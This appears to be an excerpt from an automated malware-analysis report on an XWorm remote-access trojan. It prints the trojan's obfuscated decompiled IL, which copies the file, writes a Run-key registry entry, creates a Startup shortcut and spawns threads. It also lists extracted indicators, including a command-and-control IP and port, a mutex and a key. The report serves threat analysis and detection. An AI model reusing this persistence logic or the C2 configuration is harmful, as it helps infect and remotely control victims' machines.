EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ leave.s IL_00CB: call System.Boolean Stub.4Sz4vsHCv1p576ZjZSafQbcmC::mtnNeY3lX9YEQB2qtqka8UUaF() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00CB: call System.Boolean Stub.4Sz4vsHCv1p576ZjZSafQbcmC::mtnNeY3lX9YEQB2qtqka8UUaF() call System.Boolean Stub.4Sz4vsHCv1p576ZjZSafQbcmC::mtnNeY3lX9YEQB2qtqka8UUaF() brtrue.s IL_00D8: ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::IxJ02ycmjbLXwdufQ06w25Odp4VT0zieodSNqTKyKDUIVQYmycG9s8JgHmdbAGbnuEnUkwq2Um7hQk9Zj0A ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::IxJ02ycmjbLXwdufQ06w25Odp4VT0zieodSNqTKyKDUIVQYmycG9s8JgHmdbAGbnuEnUkwq2Um7hQk9Zj0A ldstr \ ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_011A: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0131: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.4Sz4vsHCv1p576ZjZSafQbcmC::BcVC03IXsPZrCmwFQsX7hjXLB call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_015C: call My.FcNZLwMYqvlXUkt1YZVYKXKoiSvJuRvhA0ZoMewSdej1McwyQT5BNDwibJr4xrp5rWp89HDjA7nJyKwblDe My.0hEz9n9lHRPjCxfkBas3dT4TAy9KyaI1k0WKju6vytNMFdqRzjl3WvXv6K3hAUTKWV4uNEnPa0APQ0K76LM::oNkR91BX9Pph48Rc9p8SlGfqDgvzAfYVI42COY0EMAYQWs5VbDzj19IAli9NbqkGSkZdRHnDCbjnamno8O0() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_015C: call My.FcNZLwMYqvlXUkt1YZVYKXKoiSvJuRvhA0ZoMewSdej1McwyQT5BNDwibJr4xrp5rWp89HDjA7nJyKwblDe My.0hEz9n9lHRPjCxfkBas3dT4TAy9KyaI1k0WKju6vytNMFdqRzjl3WvXv6K3hAUTKWV4uNEnPa0APQ0K76LM::oNkR91BX9Pph48Rc9p8SlGfqDgvzAfYVI42COY0EMAYQWs5VbDzj19IAli9NbqkGSkZdRHnDCbjnamno8O0() call My.FcNZLwMYqvlXUkt1YZVYKXKoiSvJuRvhA0ZoMewSdej1McwyQT5BNDwibJr4xrp5rWp89HDjA7nJyKwblDe My.0hEz9n9lHRPjCxfkBas3dT4TAy9KyaI1k0WKju6vytNMFdqRzjl3WvXv6K3hAUTKWV4uNEnPa0APQ0K76LM::oNkR91BX9Pph48Rc9p8SlGfqDgvzAfYVI42COY0EMAYQWs5VbDzj19IAli9NbqkGSkZdRHnDCbjnamno8O0() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_0197: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0197: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_8 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_10 ldloc.s V_10 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_10 stloc.s V_11 ldloc.s V_11 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_12 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_12 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_021C: stloc.s V_13 ldloc.s V_11 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_8 stloc.s V_13 ldloc.s V_13 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_14 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_13 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_14 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_13 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_13 ldloc.s V_8 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.4Sz4vsHCv1p576ZjZSafQbcmC::pBbScnbyxIPKiQqRtCrIBFSCe leave.s IL_029B: call System.Void Stub.4Sz4vsHCv1p576ZjZSafQbcmC::gD5QanltHqyUakKap3E2SjznX() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_029B: call System.Void Stub.4Sz4vsHCv1p576ZjZSafQbcmC::gD5QanltHqyUakKap3E2SjznX() call System.Void Stub.4Sz4vsHCv1p576ZjZSafQbcmC::gD5QanltHqyUakKap3E2SjznX() call System.String Stub.MhfeJAxfC3Y7g7tKIcFCqPi5SMfzdWwnyxWJSQi4hSNwGKdzg8imslLIPKVNAEJuPSpicOEZN5Fk2P2Q5rA::IPvPrHy0e9JJ31R3qWQlGK12X4gV8XlXB2pQdIRMRXqZ3ZQF4eqDmTyFv6pnZfzQyRWaqT7dHc37WNDhuj8() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02B1: ldnull call System.Void Stub.T5LrbuiJ9Nz5Q2Dvixnz7glN0::IV8wof46tY5pduoIL8uNZRfuX() ldnull <null> ldftn System.Void Stub.NWgjTmgnrix9BZTa3XyMFeLjypyXcgCPg8sdc3K1HN3Qd0xtDymoxkAEg8dHgTU8PqZG0biZYKYohQ0jsRm::etAY1gQWcq4jayIbUBQ5ChnhdNmRySXVt7fyPa6p0q0WEIydHTUwrNIIgRx7p03MnzhkSPhCkAggHYfpczS() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.NWgjTmgnrix9BZTa3XyMFeLjypyXcgCPg8sdc3K1HN3Qd0xtDymoxkAEg8dHgTU8PqZG0biZYKYohQ0jsRm::DSXCvzHGWAeGzetjyrBwSVmKEXxAovyPruU5giwilMrFuSV1aKViEzISHulUNSoaL0Db8on4GeHUqdoXpfv() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
|
Name0 | Value |
|---|---|
| Mutex | vK2M0Gf3vtG7zcCz |
| CnC | 193.222.99.44 |
| Port | 6000 |
|
Config. Field0 | Value |
|---|---|
| Mutex | vK2M0Gf3vtG7zcCz |
| Hosts | 193.222.99.44 |
| Port | 6000 |
| KEY | <666666> |
| USBNM | <XWormmm> |
| family | xworm |
|
Name0 | Value | Location |
|---|---|---|
| Mutex | vK2M0Gf3vtG7zcCz Malicious |
2b7e97eefc289f848e49c5e705f00d48 |
| CnC | 193.222.99.44 Malicious |
2b7e97eefc289f848e49c5e705f00d48 |
| Port | 6000 Malicious |
2b7e97eefc289f848e49c5e705f00d48 |